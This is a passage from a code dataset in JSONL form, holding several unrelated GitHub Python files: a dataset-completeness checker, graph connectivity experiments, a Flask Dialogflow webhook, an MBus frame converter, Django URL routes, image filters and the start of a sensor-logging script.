1):\n for month in range(1, 13):\n name = filetype.format(y=year, m=month)\n if name not in contents:\n missing.append(name)\n return missing\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-s', '--start', help=\"Start year\", type=int)\n parser.add_argument('-e', '--end', help=\"end year\", type=int)\n parser.add_argument('-t', '--filetype', help=\"name of the files, with {y} for the year and {m} for the month\")\n parser.add_argument('-p', '--path', help=\"path to directory to search\")\n parser.add_argument('-o', '--output', help=\"path of where to place output file\")\n ARGS = parser.parse_args()\n\n MISSING = check_for_data(\n start=ARGS.start,\n end=ARGS.end,\n path=ARGS.path,\n filetype=ARGS.filetype)\n\n if MISSING:\n print('found {} missing files'.format(len(MISSING)))\n\n with open(ARGS.output, 'w') as fp:\n json.dump(fp=fp, obj=MISSING)\n else:\n print('No files missing')\n ","repo_name":"sterlingbaldwin/utils","sub_path":"datasetcheck.py","file_name":"datasetcheck.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26215296358","text":"import ahocorasick_op, graph_build, graph_draw, graph_op, list_op, my_rand, naive\nimport sys, random, itertools\nimport tryalgo\n\ndef percent(a,b):\n\tif b != 0:\n\t return a/b*100\n\telse:\n\t\treturn 0\n\ndef connexity_test(A, m, n, frac, N, print_progression = False, line_print = False):\n AC_c = 0\n AC_sc = 0\n AC_empty = 0\n dB_c = 0\n dB_sc = 0\n dB_empty = 0\n h_c = 0\n h_empty = 0\n\n 
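# --- Hedged editor's sketch: the log-line parsing inside Chat.messages above,
# --- isolated into one function; join/part markers are treated as non-authors.
from collections import namedtuple

Message = namedtuple('Message', ['timestamp', 'author', 'text'])

def parse_line(line):
    parts = line.split()
    if parts[2] in ('<--', '-->', '--', '=!=', '***'):
        return None  # status line, not a chat message
    return Message(' '.join(parts[:2]), parts[2], ' '.join(parts[3:]))

print(parse_line("2023-01-01 12:00:00 alice hello there"))
# Message(timestamp='2023-01-01 12:00:00', author='alice', text='hello there')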
AC_c_and_dB_c = 0\n AC_c_and_not_dB_c = 0\n not_AC_c_and_not_dB_c = 0\n not_AC_c_and_dB_c = 0\n\n AC_sc_and_dB_sc = 0\n AC_sc_and_not_dB_sc = 0\n not_AC_sc_and_not_dB_sc = 0\n not_AC_sc_and_dB_sc = 0\n\n AC_c_and_h_c = 0\n AC_c_and_not_h_c = 0\n not_AC_c_and_not_h_c = 0\n not_AC_c_and_h_c = 0\n\n AC_sc_and_h_c = 0\n AC_sc_and_not_h_c = 0\n not_AC_sc_and_not_h_c = 0\n not_AC_sc_and_h_c = 0\n\n dB_c_and_h_c = 0\n dB_c_and_not_h_c = 0\n not_dB_c_and_not_h_c = 0\n not_dB_c_and_h_c = 0\n\n dB_sc_and_h_c = 0\n dB_sc_and_not_h_c = 0\n not_dB_sc_and_not_h_c = 0\n not_dB_sc_and_h_c = 0\n\n not_dB_c_and_h_empty = 0\n \n mean_AC = 0\n mean_dB = 0\n mean_h = 0\n\n mean_nb_cc_AC = 0\n mean_nb_cc_dB = 0\n mean_nb_cc_h = 0\n\n mean_max_len_cc_AC = 0\n mean_max_len_cc_dB = 0\n mean_max_len_cc_h = 0\n\t\n\n #thresholds to keep track of the computation progression\n thresholds = [5*i for i in range(1,22)]\n current_threshold_id = 0\n current_threshold = thresholds[current_threshold_id]\n for K in range(N):\n F = my_rand.rand_list_fraction(m, A, frac)\n G_AC = graph_build.acGraph_prime_n(A, F, n)\n G_dB = graph_build.deBruijn_n(A, F, n)\n #print(G_dB[0], G_dB[1])\n G_h = graph_build.hammmingGraph(A, F, n)\n \n nodes, _ = G_AC\n ccs = graph_op.connected_components(G_AC)\n mean_AC += len(nodes)\n mean_nb_cc_AC += len(ccs)\n mean_max_len_cc_AC += list_op.max_length(ccs)\n nodes, _ = G_dB\n ccs = graph_op.connected_components(G_dB)\n mean_dB += len(nodes)\n mean_nb_cc_dB += len(ccs)\n mean_max_len_cc_dB += list_op.max_length(ccs)\n nodes, _ = G_h\n ccs = graph_op.connected_components(G_h)\n mean_h += len(nodes)\n mean_nb_cc_h += len(ccs)\n mean_max_len_cc_h += list_op.max_length(ccs)\n\n\n AC_is_c = graph_op.is_connected(G_AC)\n AC_is_sc = graph_op.is_strongly_connected(G_AC)\n dB_is_c = graph_op.is_connected(G_dB)\n dB_is_sc = graph_op.is_strongly_connected(G_dB)\n h_is_c = graph_op.is_connected(G_h)\n if AC_is_c:\n AC_c += 1\n if AC_is_sc:\n AC_sc += 1\n if dB_is_c:\n dB_c += 1\n if dB_is_sc:\n dB_sc += 1\n if h_is_c:\n h_c += 1\n else:\n pass\n \"\"\"\n nodes, edges = G_h\n cc = tryalgo.strongly_connected_components.tarjan(edges)\n if list_op.min_length(cc) > 2:\n print(K)\n print(\"F: {}\".format(F))\n \n print(\"nodes: {}\".format(nodes))\n print(\"#nodes: {}\".format(len(nodes)))\n \n print(\"#components: {}\".format(len(cc)))\n print(\"max size component: {}\".format(list_op.max_length(cc)))\n graph_draw.draw_nx(graph_draw.listlist_to_nx(G_h))\n \"\"\"\n if AC_is_c and dB_is_c:\n AC_c_and_dB_c += 1\n if AC_is_c and (not dB_is_c):\n AC_c_and_not_dB_c += 1\n if (not AC_is_c) and (not dB_is_c):\n not_AC_c_and_not_dB_c += 1\n if (not AC_is_c) and dB_is_c:\n not_AC_c_and_dB_c += 1\n #print_everything(A, F, n)\n \n if AC_is_sc and dB_is_sc:\n AC_sc_and_dB_sc += 1\n if AC_is_sc and (not dB_is_sc):\n AC_sc_and_not_dB_sc += 1\n if (not AC_is_sc) and (not dB_is_sc):\n not_AC_sc_and_not_dB_sc += 1\n if (not AC_is_sc) and dB_is_sc:\n not_AC_sc_and_dB_sc += 1\n \n if AC_is_c and h_is_c:\n AC_c_and_h_c += 1\n if AC_is_c and (not h_is_c):\n AC_c_and_not_h_c += 1\n if (not AC_is_c) and (not h_is_c):\n not_AC_c_and_not_h_c += 1\n if (not AC_is_c) and h_is_c:\n not_AC_c_and_h_c += 1\n \n if AC_is_sc and h_is_c:\n AC_sc_and_h_c += 1\n if AC_is_sc and (not h_is_c):\n AC_sc_and_not_h_c += 1\n if (not AC_is_sc) and (not h_is_c):\n not_AC_sc_and_not_h_c += 1\n if (not AC_is_sc) and h_is_c:\n not_AC_sc_and_h_c += 1\n \n if dB_is_c and h_is_c:\n dB_c_and_h_c += 1\n if dB_is_c and (not h_is_c):\n dB_c_and_not_h_c += 1\n if (not 
dB_is_c) and (not h_is_c):\n not_dB_c_and_not_h_c += 1\n if (not dB_is_c) and h_is_c:\n not_dB_c_and_h_c += 1\n \n if dB_is_sc and h_is_c:\n dB_sc_and_h_c += 1\n if dB_is_sc and (not h_is_c):\n dB_sc_and_not_h_c += 1\n if (not dB_is_sc) and (not h_is_c):\n not_dB_sc_and_not_h_c += 1\n if (not dB_is_sc) and h_is_c:\n not_dB_sc_and_h_c += 1\n \n nodes, _ = G_AC\n if nodes == []:\n AC_empty += 1\n\n nodes, _ = G_dB\n if nodes == []:\n dB_empty += 1\n\n nodes, _ = G_h\n if nodes == []:\n h_empty += 1\n if not dB_is_c:\n not_dB_c_and_h_empty += 1\n #update current \"progression\" threshold if necessary\n if print_progression:\n while K >= N * current_threshold // 100 and current_threshold <= 100:\n print(\"|{}%\".format(current_threshold), end=\"\")\n sys.stdout.flush()\n current_threshold_id += 1\n current_threshold = thresholds[current_threshold_id]\n mean_AC /= N\n mean_dB /= N\n mean_h /= N\n mean_nb_cc_AC /= N\n mean_nb_cc_dB /= N\n mean_nb_cc_h /= N\n mean_max_len_cc_AC /= N\n mean_max_len_cc_dB /= N\n mean_max_len_cc_h /= N\n if print_progression:\n print(\"\")\n if line_print:\n print(\"{};{};{};{};{};{};{};{};{};{};{};{};{};{};{};{};{};{};{};{};{};{};{};{};{};{};{};{};{};{}\".format(A, m, n, frac, len(F), N,\n percent(AC_c, N), percent(dB_c, N), percent(h_c, N),\n percent(AC_sc, N), percent(dB_sc, N),\n percent(AC_empty, N), percent(dB_empty, N), percent(h_empty, N),\n percent(not_AC_c_and_not_h_c, N), #cases handled by theorem (with AC)\n percent(not_AC_c_and_not_h_c, max(N - h_c, 1)), #h-non connexity caught by theorem (with AC)\n percent(not_dB_c_and_not_h_c, N), #cases handled by theorem (with dB)\n percent(not_dB_c_and_not_h_c, max(N - h_c, 1)), #h-non connexity caught by theorem (with dB)\n percent(not_dB_c_and_h_c, max(N - dB_c, 1)), #counterexamples to theorem\n percent(AC_sc_and_dB_sc + not_AC_sc_and_not_dB_sc, N), #when both AC and dB have strong connexity at the same time\n percent(not_AC_c_and_dB_c, N), #counterexamples to: (not AC_c) => (not dB_c)\n mean_AC, mean_dB, mean_h, mean_nb_cc_AC, mean_nb_cc_dB, mean_nb_cc_h, mean_max_len_cc_AC, mean_max_len_cc_dB, mean_max_len_cc_h))\n\n sys.stdout.flush()\n else:\n print(\"A={}, m(F)={}, n={}, frac={}, |F|={}\".format(A, m, n, frac, len(F)))\n print(\"dB_c: {}% ({}/{})\".format(dB_c / N * 100, dB_c, N))\n print(\"dB_sc: {}% ({}/{})\".format(dB_sc / N * 100, dB_sc, N))\n print(\"h_c: {}% ({}/{})\".format(h_c / N * 100, h_c, N))\n print(\"h_empty: {}% ({}/{})\".format(h_empty / N * 100, h_empty, N))\n print(\"Cases handled by theorem: {}% ({}/{})\".format(not_dB_c_and_not_h_c / N * 100, not_dB_c_and_not_h_c, N))\n print(\"h-non connexity caught by theorem: {}% ({}/{})\".format(not_dB_c_and_not_h_c / max(N - h_c, 1) * 100, not_dB_c_and_not_h_c, N - h_c))\n print(\"Counterexamples to theorem: {}% ({}/{})\".format(not_dB_c_and_h_c / max(N - dB_c, 1) * 100, not_dB_c_and_h_c, N - dB_c))\n\ndef print_everything(A, F, n):\n print(\"F: {}\".format(F))\n print(\"#motifs: {}\".format(len(F)))\n\n G_AC_F_prime = graph_build.acGraph_prime(A, F)\n labels, edges = G_AC_F_prime\n print(\"AC_prime\")\n print(\"#nodes: {}\".format(len(labels)))\n print(labels)\n print(edges)\n graph_draw.draw_nx(graph_draw.listlist_to_nx(G_AC_F_prime))\n\n G = graph_build.deBruijn(A, F)\n nodes, edges = G\n print(\"dB\")\n print(\"#nodes: {}\".format(len(nodes)))\n print(nodes)\n print(edges)\n graph_draw.draw_nx(graph_draw.listlist_to_nx(G))\n\n G = graph_build.hammmingGraph(A, F, n)\n nodes, edges = G\n print(\"hamming\")\n print(\"#nodes: 
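# --- Hedged editor's sketch: the progress-threshold pattern used by
# --- connexity_test(), printing a marker each time the loop crosses the next
# --- 5% boundary (N and the loop body are placeholders).
import sys

N = 1000
thresholds = [5 * i for i in range(1, 21)]
t = 0
for K in range(N):
    while t < len(thresholds) and K >= N * thresholds[t] // 100:
        print("|{}%".format(thresholds[t]), end="")
        sys.stdout.flush()
        t += 1
print("")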
{}\".format(len(nodes)))\n #print(nodes)\n ccs = graph_op.strongly_connected_components(G)\n print(\"connected components: {}\".format(len(ccs)))\n list_op.print_lengths(ccs)\n #print(ccs)\n graph_draw.draw_nx(graph_draw.listlist_to_nx(G))\n\ndef print_per_n_from(A, F, n_ini, draw=False):\n n = n_ini\n print(\"F: {}\".format(F))\n print(\"#motifs: {}\".format(len(F)))\n while True:\n G = graph_build.hammmingGraph(A, F, n)\n nodes, _ = G\n ccs = graph_op.strongly_connected_components(G)\n print(\"n: {}\". format(n), end=\" | \")\n print(\"#nodes: {}\".format(len(nodes)), end=\" | \")\n print(\"#ccs: {}\".format(len(ccs)), end=\" | \")\n list_op.print_lengths(ccs)\n if draw:\n graph_draw.draw_nx(graph_draw.listlist_to_nx(G))\n n += 1\n\n\ndef rand_test(A, n, N, print_progression = True):\n mean_minus = 0.0\n mean_plus = 0.0\n max_minus = 0\n max_plus = 0\n mean_M = 0.0\n mean_max_length_M = 0.0\n mean_sum_length_M = 0.0\n max_M = 0\n max_max_length_M = 0\n max_sum_length_M = 0\n \n #thresholds to keep track of the computation progression\n thresholds = [5*i for i in range(1,22)]\n current_threshold_id = 0\n current_threshold = thresholds[current_threshold_id]\n for K in range(1, N+1):\n #choose w1 at random and obtain w2 with a random mutation\n w1 = my_rand.rand_word(n, A)\n i = random.randint(0, n-1)\n A2 = A.copy()\n A2.remove(w1[i])\n w2 = w1[:i] + random.choice(A2) + w1[i+1:]\n #compute M for both words\n M1 = naive.M(w1, A)\n M2 = naive.M(w2, A)\n #update stats\n minus, plus = list_op.difference(M1,M2)\n len_minus = len(minus)\n len_plus = len(plus)\n len_M1 = len(M1)\n max_length_M1 = list_op.max_length(M1)\n sum_length_M1 = list_op.sum_length(M1)\n\n mean_minus += len_minus\n mean_plus += len_plus\n max_minus = max(max_minus, len_minus)\n max_plus = max(max_plus, len_plus)\n mean_M += len_M1\n mean_max_length_M += max_length_M1\n mean_sum_length_M += sum_length_M1\n max_M = max(max_M, len_M1)\n max_max_length_M = max(max_max_length_M, max_length_M1)\n max_sum_length_M = max(max_sum_length_M, sum_length_M1)\n #update current \"progression\" threshold if necessary\n if print_progression:\n while K >= N * current_threshold // 100 and current_threshold <= 100:\n print(\"|{}%\".format(current_threshold), end=\"\")\n sys.stdout.flush()\n current_threshold_id += 1\n current_threshold = thresholds[current_threshold_id]\n if print_progression:\n print(\"\")\n mean_minus /= N\n mean_plus /= N\n mean_M /= N\n mean_max_length_M /= N\n mean_sum_length_M /= N\n #store stats in a dictionary\n d = {}\n d[\"A\"] = A\n d[\"n\"] = n\n d[\"N\"] = N\n d[\"mean_M\"] = mean_M\n d[\"max_M\"] = max_M\n d[\"mean_minus\"] = mean_minus\n d[\"mean_plus\"] = mean_plus\n d[\"max_minus\"] = max_minus\n d[\"max_plus\"] = max_plus\n d[\"mean_max_length_M\"] = mean_max_length_M\n d[\"max_max_length_M\"] = max_max_length_M\n d[\"mean_sum_length_M\"] = mean_sum_length_M\n d[\"max_sum_length_M\"] = max_sum_length_M\n return d\n\ndef print_stats_verbose(d, name_stats):\n for x in name_stats:\n print(\"{}: {}\".format(x,d[x]))\n\ndef print_stats_line(d, name_stats):\n for x in name_stats:\n print(\"{}\\t\".format(d[x]), end=\"\")\n print(\"\")\n sys.stdout.flush()\n\ndef print_stats_by_line_up_to_(K, A, N, name_stats):\n for k in range(20, K+1):\n d = rand_test(A, k, N, False)\n print_stats_line(d, name_stats)\n\ndef find_all_non_c_aux(A, words, len_words, n, current_F, i, rem, verbose):\n\tif rem == 0:\n\t\t#print(current_F)\n\t\tG_h = graph_build.hammmingGraph(A, current_F, n)\n\t\tif not 
graph_op.is_connected(G_h):\n\t\t\t#print(current_F)\n\t\t\tif verbose:\n\t\t\t\tG_AC_F_prime = graph_build.acGraph_prime(A, current_F)\n\t\t\t\tlabels, edges = G_AC_F_prime\n\t\t\t\tprint(\"AC_prime\")\n\t\t\t\tprint(\"#nodes: {}\".format(len(labels)))\n\t\t\t\tprint(labels)\n\t\t\t\tprint(edges)\n\t\t\t\tgraph_draw.draw_nx(graph_draw.listlist_to_nx(G_AC_F_prime))\n\t\t\t\tprint(\"hamming\")\n\t\t\t\tnodes, _ = G_h\n\t\t\t\tccs = graph_op.strongly_connected_components(G_h)\n\t\t\t\tprint(\"n: {}\". format(n), end=\" | \")\n\t\t\t\tprint(\"#nodes: {}\".format(len(nodes)), end=\" | \")\n\t\t\t\tprint(\"#ccs: {}\".format(len(ccs)), end=\" | \")\n\t\t\t\tlist_op.print_lengths(ccs)\n\t\t\t\t#graph_draw.draw_nx(graph_draw.listlist_to_nx(G_h))\n\t\t\tG_AC = graph_build.acGraph_prime(A, current_F)\n\t\t\tif not graph_op.is_connected(G_AC):\n\t\t\t\treturn (1, 1)\n\t\t\telse:\n\t\t\t\treturn (0, 1)\n\t\telse:\n\t\t\treturn (0, 0)\n\telse:\n\t\tK = 0 ; N = 0\n\t\tfor j in range(i+1, len_words - rem + 1):\n\t\t\tnew_F = [u for u in current_F]\n\t\t\tnew_F.append(words[j])\n\t\t\t(new_K, new_N) = find_all_non_c_aux(A, words, len_words, n, new_F, j, rem-1, verbose)\n\t\t\tK += new_K\n\t\t\tN += new_N\n\t\treturn (K, N)\n\t\t\n\ndef find_all_non_c(A, n, m, k, verbose = False):\n\tletters = \"\".join(A)\n\twords = []\n\tfor li in itertools.product(letters, repeat=m):\n\t\tu = \"\".join(li)\n\t\twords.append(u)\n\tlen_words = len(words)\n\tK, N = find_all_non_c_aux(A, words, len_words, n, [], -1, k, verbose)\n\tprint(K, N, percent(K,N))\n\t","repo_name":"mohoc/M2-misc","sub_path":"code/my_print.py","file_name":"my_print.py","file_ext":"py","file_size_in_byte":13983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23651169524","text":"from flask import Flask, request, abort, jsonify\nimport os ,json, threading\nfrom src.message import get_reply\n\napp = Flask(__name__)\ntoken = json.load((open('token.json')))\n\n@app.route(\"/callback\", methods=['POST'])\ndef callback():\n # get request body as text\n req = request.get_json(silent=True, force=True)\n # handle webhook body\n try:\n parameter = req['queryResult']['parameters']\n coin = parameter['CoinType']\n asktype = parameter['AskType'] if parameter['AskType'] else 'PRICE'\n fulfillmentText = get_reply(coin, asktype)\n except:\n fulfillmentText = 'Server is sleeping now. 
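# --- Hedged editor's sketch: the parameter-default rule in callback() above,
# --- shown on a stripped-down Dialogflow request body (values hypothetical).
req = {"queryResult": {"parameters": {"CoinType": "BTC", "AskType": ""}}}
parameter = req["queryResult"]["parameters"]
coin = parameter["CoinType"]
asktype = parameter["AskType"] if parameter["AskType"] else "PRICE"
print(coin, asktype)  # BTC PRICE -- an empty AskType falls back to 'PRICE'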
Sorry'\n abort(400)\n reply = {\n \"fulfillmentText\": fulfillmentText\n }\n return jsonify(reply)\n\n\nif __name__ == \"__main__\":\n port = None\n try:\n #hekoru\n port = int(os.getenv(\"PORT\"))\n except:\n #local\n port = 5050\n app.run(host=\"0.0.0.0\", port=port)\n\n #app.run()\n","repo_name":"LazyerIJ/Bithumb_Line_Bot","sub_path":"line_dialogflow_heroku/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8479623421","text":"from ctypes import c_char_p, cast, sizeof, addressof, memmove\n\nimport binascii\n\nfrom mbus.MBus import MBus, MBusFrame\nfrom mbus.MBusDataVariableHeader import MBusDataVariableHeader\nfrom mbus.MBusLowLevel import MBUS_FRAME_LONG_START, MBUS_CONTROL_MASK_RSP_UD, MBUS_CONTROL_INFO_RESP_VARIABLE, MBUS_FRAME_STOP, MBUS_FRAME_TYPE_LONG\n\nimport logging\nlog = logging.getLogger(__name__)\nlog.addHandler(logging.NullHandler())\n\nclass Lansen2MBus(object):\n def __init__(self, libpath=None):\n self._mbus = MBus(host=\"localhost\", port=8888, libpath=libpath)\n self._mbus_frame = MBusFrame()\n\n def getxml(self, buf):\n _l_field = buf[0]\n log.debug(\"L-field: %d\", _l_field)\n if _l_field != len(buf):\n log.debug(\"buf: %s\", binascii.hexlify(buf))\n raise Exception(\"L-field %d != length of frame %d\", _l_field, len(buf))\n\n if buf[10] != 0x7a:\n raise Exception(\"only short frame is supported\")\n\n _d_field = buf[15:]\n\n self._mbus._libmbus.parse_set_debug(1)\n\n self._mbus_frame.start1 = MBUS_FRAME_LONG_START\n self._mbus_frame.length1 = len(_d_field) + sizeof(MBusDataVariableHeader) + 3\n self._mbus_frame.length2 = self._mbus_frame.length1\n self._mbus_frame.start2 = self._mbus_frame.start1\n self._mbus_frame.control = MBUS_CONTROL_MASK_RSP_UD\n self._mbus_frame.address = 0x00\n self._mbus_frame.control_information = MBUS_CONTROL_INFO_RESP_VARIABLE\n self._mbus_frame.stop = MBUS_FRAME_STOP\n self._mbus_frame.type = MBUS_FRAME_TYPE_LONG\n\n header = MBusDataVariableHeader()\n header.id_bcd[0] = buf[4]\n header.id_bcd[1] = buf[5]\n header.id_bcd[2] = buf[6]\n header.id_bcd[3] = buf[7]\n header.manufacturer[0] = buf[2]\n header.manufacturer[1] = buf[3]\n header.version = buf[8]\n header.medium = buf[9]\n header.access_no = buf[11]\n header.status = buf[12]\n header.signature[0] = buf[13]\n header.signature[1] = buf[14]\n\n memmove(self._mbus_frame.data, addressof(header), sizeof(header))\n self._mbus_frame.data_size = sizeof(MBusDataVariableHeader) + len(_d_field)\n self._mbus_frame.data[12:self._mbus_frame.data_size] = [x for x in _d_field]\n\n self._mbus_frame.checksum = self._mbus_frame.control + self._mbus_frame.address + self._mbus_frame.control_information\n for i in range(0, self._mbus_frame.data_size):\n self._mbus_frame.checksum += self._mbus_frame.data[i]\n\n if self._mbus._libmbus.frame_verify(self._mbus_frame):\n raise Exception(\"mbus verification error: \" + str(self._mbus._libmbus.error_str()))\n\n mbus_frame_data = self._mbus.frame_data_parse(self._mbus_frame)\n xml_result = self._mbus._libmbus.frame_data_xml(mbus_frame_data)\n xml = cast(xml_result, c_char_p).value.decode('ISO-8859-1')\n return xml\n\n# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4\n","repo_name":"droid4control/pylansen","sub_path":"pylansen/lansen2mbus.py","file_name":"lansen2mbus.py","file_ext":"py","file_size_in_byte":2980,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} 
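# --- Hedged editor's sketch: the header-copy trick used in getxml() above,
# --- reduced to plain ctypes: memmove a structure into the leading bytes of a
# --- frame buffer (the Header layout here is a made-up miniature).
from ctypes import Structure, c_uint8, addressof, memmove, sizeof

class Header(Structure):
    _fields_ = [("id_bcd", c_uint8 * 4), ("version", c_uint8)]

buf = (c_uint8 * 16)()
hdr = Header((c_uint8 * 4)(0x12, 0x34, 0x56, 0x78), 0x0A)
memmove(buf, addressof(hdr), sizeof(hdr))      # copy the packed header bytes
print([hex(b) for b in buf[:5]])               # ['0x12', '0x34', '0x56', '0x78', '0xa']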
+{"seq_id":"71501548906","text":"from django.urls import path\n\nfrom .views import get_user_autocomplete, DialogsView, DialogMessagesView\n# from .views import DialogsView, MessagesView, CreateDialogView\n\napp_name = 'private_messages'\n\nurlpatterns = [\n # path('dialogs/', DialogsView.as_view(), name='dialogs'),\n # path('dialogs/create//', CreateDialogView.as_view(), name='create_dialog'),\n # url(r'^dialogs/(?P\\d+)/$', login_required(views.MessagesView.as_view()), name='messages'),\n # path('dialogs/', DialogView.as_view(), name='show_dialog'),\n path('create/autocomplete/', get_user_autocomplete),\n # path('create/', CreateMessageView.as_view(), name='create_message'),\n path('dialog//', DialogMessagesView.as_view(), name='dialog_page'),\n path('', DialogsView.as_view(), name='dialogs'),\n]\n","repo_name":"DeeJeezz/articlesboard","sub_path":"private_messages/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30965814930","text":"\nimport numpy as np\nimport cv2\nimport sys, math\nfrom PIL import Image\nfrom typing import Tuple, List\nimport matplotlib.pyplot as plt\nfrom skimage import io, img_as_float\nfrom histograms import *\n\ndef filterImage(inImage, kernel):\n\n M = inImage.shape[0] # Obtener el número de filas de la imagen\n N = inImage.shape[1] # Obtener el número de columnas de la imagen\n\n if kernel.ndim == 1:\n kernel_height = kernel.shape[0] # Obtener la altura del kernel\n kernel_width = 1 # La anchura del kernel es 1 para un kernel unidimensional\n else:\n kernel_height = kernel.shape[0] # Obtener la altura del kernel\n kernel_width = kernel.shape[1] # Obtener la anchura del kernel\n\n outImage = np.zeros(inImage.shape) # Crear una matriz de salida con las mismas dimensiones que la imagen de entrada\n\n height = (kernel_height - 1) // 2 # Calcular el desplazamiento vertical necesario para aplicar el kernel\n width = (kernel_width - 1) // 2 # Calcular el desplazamiento horizontal necesario para aplicar el kernel\n\n image = np.zeros((M + (2 * height), N + (2 * width))) # Crear una imagen con relleno\n\n # Copiar la imagen original en la imagen con relleno\n image[height:image.shape[0] - height, width:image.shape[1] - width] = inImage\n\n for row in range(M):\n for col in range(N):\n # Realizar la convolución del kernel con la sección correspondiente de la imagen con relleno\n outImage[row, col] = np.sum(kernel * image[row:row + kernel_height, col:col + kernel_width])\n\n return outImage\n\n\ndef createDelta(dims: Tuple[int, int] = (256, 256)) -> np.ndarray :\n blk = np.zeros(dims)\n\n blk[int(dims[0]/2), int(dims[1]/2)] = 1\n\n return blk\n\n\n\ndef gaussKernel1D(sigma):\n N = int(2 * np.ceil(3 * sigma) + 1) # Calcular el tamaño del kernel basado en el valor de sigma\n\n result = np.zeros(N) # Aarray de ceros para almacenar los valores del kernel\n\n mid = int(N / 2) # Calcular la posición central del kernel\n\n # fórmula de la función de distribución Gaussiana\n result = np.array([(1 / (np.sqrt(2 * np.pi) * sigma)) * (1 / (np.exp((i ** 2) / (2 * sigma ** 2)))) for i in range(-mid, mid + 1)])\n\n return result / sum(result) # Normalizar el kernel dividiendo por la suma de sus valores\n\n\n\n\n\n\ndef gaussianFilter (inImage, sigma):\n\n gausskernel = gaussKernel1D(sigma)\n out = filterImage(inImage, gausskernel)\n out2 = filterImage(out, np.transpose(gausskernel))\n\n return out2\n\n\n\n\ndef medianFilter(inImage: np.ndarray, filterSize: 
int) -> np.ndarray:\n \n dim = np.shape(inImage) # Dimensions of the input image\n outImage = np.empty(dim) # Create an empty array to store the output image\n mitad = int((filterSize / 2)) # Compute half the filter size\n\n for row in range(0, dim[0]): # Iterate over each row of the image\n for col in range(0, dim[1]): # Iterate over each column of the image\n\n # Compute the bounds of the submatrix based on the current position and the filter size\n left = 0 if (row - mitad) < 0 else row - mitad\n right = dim[0] - 1 if (row + mitad) > (dim[0] - 1) else row + mitad + 1\n top = 0 if (col - mitad) < 0 else col - mitad\n bottom = dim[1] - 1 if (col + mitad) > (dim[1] - 1) else col + mitad + 1\n\n submatrix = inImage[left:right, top:bottom] # Extract the submatrix from the original image\n outImage[row, col] = np.median(submatrix) # Take the median of the submatrix and assign it to the output image\n\n return outImage # Return the filtered output image\n\n\n\n\ndef highBoost(inImage,A,method,param):\n # Guard conditions\n if (method is None) or (param is None):\n return inImage\n\n if method == 'gaussian':\n outImage = gaussianFilter(inImage,param)\n elif method == 'median':\n outImage = medianFilter(inImage,int(param))\n else:\n return None\n\n if A >= 0:\n # If A is positive, keep information from the original image\n inImage = np.multiply(inImage,A).astype(np.uint8)\n return np.subtract(inImage,outImage)\n else:\n return outImage\n\n\n\n#filter_image example \ndelta = createDelta()\nio.imsave(\"./resultados/delta.png\", delta)\n\n\n# kernel=cv2.imread('kernel1.png')\n# kernel=cv2.cvtColor(kernel,cv2.COLOR_BGR2GRAY)\n# delta=cv2.imread('delta.png')\n# delta=cv2.cvtColor(delta,cv2.COLOR_BGR2GRAY)\n\n# # M = inImage.shape[0] # Get the number of rows of the image\n# # N = inImage.shape[1] # Get the number of columns of the image\n# # print(M)\n# # print(N)\n# #delta=cv2.cvtColor(delta,cv2.COLOR_BGR2GRAY)\n# # laplacian = np.array((\n# # [0, 1, 0],\n# # [1, -4, 1],\n# # [0, 1, 0]), dtype=\"int\")\n\n# outImage2=filterImage(delta,kernel[:-1,:-1])\n# io.imsave(\"./resultados/pruebakernel.png\", outImage2)\n#cv2.imshow('original',gris)\n#cv2.imshow('my filter',outImage2)\n\n\n\n#######KERNEL FUNCTION####################\n# salida=gaussKernel1D(10)\n# print(salida)\n# plt.plot(salida)\n\n# plt.show()\n\n\n\n\n#######GAUSSIAN FUNCTION####################\n# gauss=cv2.imread('delta.png')\n# gris=cv2.cvtColor(gauss,cv2.COLOR_BGR2GRAY)\n# outImage1=gaussianFilter(gris, 5)\n# #outImage1 = adjustIntensity(outImage1, outRange=[0, 255])\n# #outImage2=cv2.GaussianBlur(gris,(7,7),0)\n# # cv2.imshow('original',gris)\n# # cv2.imshow('my filter',outImage1)\n# imgMod = gaussianFilter(gris, 10)\n# io.imsave(\"./resultados/gaussianFilter.png\", adjustIntensity(imgMod, [], [0, 255]))\n# plotgaussian=cv2.imread('gaussianFilter.png')\n# #(hist, binsIn) = np.histogram(plotgaussian, 256)\n# plt.plot(256, imgMod)\n\n# plt.show()\n\n\n\n\n##########MEDIAN FUNCTION####################\n# lisa = cv2.imread('grid.png')\n# img_median = cv2.medianBlur(lisa, 5)\n\n# cv2.imshow(\"median\", np.hstack((lisa, img_median)))\n# img = Image.open(\"grid.png\").convert(\"L\")\n# arr = np.array(img)\n# removed_noise = medianFilter(arr, 5) \n# img = Image.fromarray(removed_noise)\n# img.show()\n\n\n#######HIGH FUNCTION####################\n# img = Image.open(\"image2.png\").convert(\"L\")\n# arr = np.array(img)\n# 
outImage1=highBoost(arr,-3,\"median\",5)\n# #En caso de gaussian poner lo de abajo\n# #outImage1 = adjustIntensity(outImage1, outRange=[0, 255])\n# #io.imsave(\"./resultados/highGaussianFilter.png\", adjustIntensity(imgMod, [], [0, 255]))\n# img = Image.fromarray(outImage1)\n# img.show()\n\n\n\n\n\ncv2.waitKey(0)","repo_name":"xabijg/VA","sub_path":"p1/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":6468,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38355416992","text":"import time\n\nfrom si7021 import Si7021\n\nimport Adafruit_DHT\n\nimport bme680\n\nimport board\nimport busio\nimport adafruit_mpl115a2\n\n# Import Adafruit IO REST client.\nfrom Adafruit_IO import Client, RequestError, Feed\n\n# Import the device driver stuff\nfrom smbus import SMBus\n\n# Set to your Adafruit IO key.\n# Remember, your key is a secret,\n# so make sure not to publish it when you publish this code!\nADAFRUIT_IO_KEY = 'xxxxx'\n\n# Set to your Adafruit IO username.\n# (go to 